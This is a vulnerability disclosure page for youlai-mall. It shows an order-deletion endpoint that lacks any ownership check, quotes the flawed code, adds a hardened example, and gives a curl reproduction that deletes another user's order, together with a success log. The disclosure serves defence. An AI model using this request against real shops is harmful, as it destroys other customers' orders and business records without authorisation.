| Title | youlai-mall latest Improper Control of Resource Identifiers |
|---|
| Description | # youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts
## Contributors: Huang Weigang
### 1. Vulnerability Impact
- youlai-mall (latest)
- `https://github.com/youlaitech/youlai-mall`
### 2. Vulnerability Location
- DELETE `/mall-oms/app-api/v1/orders/{orderId}`
### 3. Code Analysis
- File: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java`
- Route and method:

```java
@DeleteMapping("/{orderId}")
public Result<Boolean> deleteOrder(@PathVariable Long orderId) {
    // orderId comes straight from the path and is handed to the service unchanged
    boolean result = orderService.deleteById(orderId);
    return Result.success(result);
}
```

- Service: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java`

```java
public boolean deleteById(Long orderId) {
    // hard delete with no ownership, role or order-status check
    return this.removeById(orderId);
}
```

- Issues:
  - No ownership check (missing validation that the provided `orderId` belongs to the currently logged-in member, e.g., comparing the order's `memberId` with `SecurityUtils.getMemberId()`).
  - No role/permission control (no `@PreAuthorize`; any authenticated App user can delete arbitrary orders).
  - Direct parameter trust (the attacker-controlled `orderId` is used directly in the database deletion without authorization).
  - Supports horizontal privilege escalation (the attacker supplies a victim's `orderId` and can delete that victim's orders).
  - No state validation (missing check of the order status; even paid or shipped orders can be deleted).
  - No deletion auditing or soft-delete mechanism (hard delete without logging who initiated it).
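The following is an added example of what a hardened `deleteById` looks like, not code from youlai-mall; the `Order` record, the in-memory store, the status names and the `DELETABLE` policy are assumptions, and `callerMemberId` stands for the value the report says should come from `SecurityUtils.getMemberId()`.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

public class OrderDeletionCheck {
    // Constructed order record with the two fields the report says must be checked.
    record Order(long id, long memberId, String status) {}

    // Constructed in-memory store standing in for the orders table.
    private final Map<Long, Order> orders = new HashMap<>();
    // Assumed business rule: customers may only delete orders in these states.
    private static final Set<String> DELETABLE = Set.of("PENDING", "CANCELLED");

    OrderDeletionCheck(Order... seed) {
        for (Order o : seed) orders.put(o.id(), o);
    }

    // Hardened replacement for the report's deleteById. callerMemberId is the
    // authenticated member id, which in the real service comes from
    // SecurityUtils.getMemberId(), never from the request.
    boolean deleteById(long orderId, long callerMemberId) {
        Order order = orders.get(orderId);
        if (order == null || order.memberId() != callerMemberId) {
            // Same answer for "missing" and "not yours", so the endpoint does not
            // reveal which order ids exist.
            throw new SecurityException("order not found");
        }
        if (!DELETABLE.contains(order.status())) {
            throw new IllegalStateException("order " + orderId + " is " + order.status());
        }
        // Record who removed what before the row disappears.
        System.out.printf("AUDIT member=%d deleted order=%d%n", callerMemberId, orderId);
        return orders.remove(orderId) != null;
    }

    public static void main(String[] args) {
        OrderDeletionCheck svc = new OrderDeletionCheck(
                new Order(5001, 200, "PENDING"),   // User B's pending order
                new Order(5002, 100, "PAID"));     // User A's own, already paid
        // {orderId, callerMemberId}: B's order as A, A's paid order as A, B's order as B
        for (long[] a : new long[][] {{5001, 100}, {5002, 100}, {5001, 200}}) {
            try {
                System.out.println(a[0] + " as " + a[1] + " -> " + svc.deleteById(a[0], a[1]));
            } catch (RuntimeException e) {
                System.out.println(a[0] + " as " + a[1] + " -> " + e.getMessage());
            }
        }
    }
}
```

Only the third attempt succeeds; the first is refused as not found and the second as a state violation, and the audit line names the member who performed the delete.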
### Vulnerability Reproduction
- Preconditions
  - Attacker has a valid App login token (`Authorization: Bearer <token>`).
  - Victim's `orderId` is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).
  - Target endpoint: `DELETE /mall-oms/app-api/v1/orders/{orderId}`
- Steps (horizontal privilege escalation: delete another user's order)
  - Log in as User A (memberId=100) and obtain a valid token.
  - Call the endpoint with User B's `orderId` (e.g., orderId=5001):
    `curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"`
  - Observe a 200 OK response, for example:
    `{"code":"00000","data":true,"msg":"一切ok"}`
  - Outcome: without any ownership validation, User A successfully deletes User B's order, causing data loss and business disruption.
- Example request/response log (reference):

```json
{
  "data": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  },
  "test": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  }
}
```
### 4. Impact Description
- Unauthorized data deletion
  - Any logged-in user can delete arbitrary orders, causing permanent data loss and destruction of business records.
- Horizontal privilege escalation (BOLA/IDOR)
  - The `orderId` path parameter is not validated against the authenticated user's identity, allowing cross-account operations.
- Business logic bypass
  - Order deletion should respect business rules (e.g., only pending/cancelled orders can be deleted), but this endpoint allows deletion of any order regardless of status.
- Financial and operational impact
  - Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures.
- Lack of audit trail and recovery
  - A hard delete without logging makes forensic investigation impossible and prevents data recovery.
- Compliance violations
  - E-commerce platforms typically require order retention for accounting, tax, and legal purposes; unauthorized deletion violates these requirements.
- Attack chain amplification
  - When combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts.
- System trust erosion
  - Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.
|
|---|
| Source | https://github.com/Hwwg/cve/issues/29 |
|---|
| User | huangweigang (UID 88993) |
|---|
| Submitted | 2025-12-07 07:07 (6 months ago) |
|---|
| Moderation | 2025-12-25 10:50 (18 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB Entry | 334476 [youlaitech youlai-mall 1.0.0/2.0.0 /app-api/v1/orders/ orderId privilege escalation] |
|---|
| Points | 0 |
|---|